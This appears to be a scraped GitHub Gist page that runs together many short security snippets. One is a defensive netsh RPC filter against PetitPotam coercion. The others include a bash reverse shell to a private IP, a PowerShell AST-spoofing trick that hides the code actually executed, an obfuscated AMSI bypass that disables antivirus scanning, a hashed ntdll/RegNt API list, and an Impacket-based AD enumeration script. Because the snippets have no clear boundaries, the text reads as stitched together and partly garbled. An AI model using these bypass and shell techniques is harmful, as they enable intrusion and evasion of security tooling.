Skip to content

Instantly share code, notes, and snippets.

@k4nfr3
k4nfr3 / gist:9808709a83b9a56376ba92c332205ef0
Created January 23, 2025 14:13
RPC Filter against Coercer (petitPotam)
netsh
rpc filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=12345678–1234-ABCD-EF00–0123456789AB
add filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=c681d488-d850–11d0–8c52–00c04fd90f7e
bash -i >& /dev/tcp/192.168.1.23/6666 0>&1
$SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast
$ExecutedAst = [ScriptBlock]::Create("Write-Output 'My Hidden Hello Hidden'").Ast
$Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,$null,$null,$null,$ExecutedAst.EndBlock.Copy(),$null)
$Sb = $Ast.GetScriptBlock()
$Sb&
Add NugetComponent Microsoft.Win32.Registry
Add NugetComponent System.Security.Cryptography.ProtectedData
Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/
Tested on lates version Kiteworks 8.3.0
=========================================
/* Created by Sergei Gundorov 1/2/2020
* Intent: provide sample project for encrypting secrets with DPAPI while working with
* Power BI Embedded and API tutorials and samples.
@k4nfr3
k4nfr3 / velocity.py
Last active June 30, 2023 15:02
velocity.ch daily script to repurchase my free parking as I'm using it daily
import requests
import json
# Proxy settings fo debug (with burp or other)
proxy_enable = False
proxy = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
#!/usr/bin/env python
# modifications of original script GetAdusers.py from Impacket.
# this version returns the list of last seen 24h machines
#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11
#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
#
#Password:
#[*] Querying 192.168.16.11 for information about domain.
#Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address
#-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------
#!/usr/bin/env python
from __future__ import print_function
import json
import re
import socket
import ssl
import subprocess
import sys
'ntdll.dll' '4097367' '0x3e8557'
'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662'
'RegNtPostCreateKey' '76320549262' '0x11c50f298e'
'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745'
'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb'
'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16'
'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8'
'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd'
'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8'
'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2'
Scrapped from official web site: https://downloads.rclone.org/v.../SHA1SUMS
===========================================================================
Windows Clients
ecce335a75b0f8678ba0494b178f3b41309b72be rclone-current-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134 rclone-current-windows-amd64.zip
ecce335a75b0f8678ba0494b178f3b41309b72be rclone-v1.40-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134 rclone-v1.40-windows-amd64.zip
18d6a87012de120c66b5abaa97f5932fe56beee7 rclone-v1.41-windows-386.zip
6f4bee89380b70742ba7d37c80da0f0b4f890612 rclone-v1.41-windows-amd64.zip
@k4nfr3
k4nfr3 / am.ps1
Last active February 3, 2022 12:02
AMSI Bypass
Write-Host '[+] Loading AMSI Bypass...'
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Write-Host '[+] done' -ForegroundColor green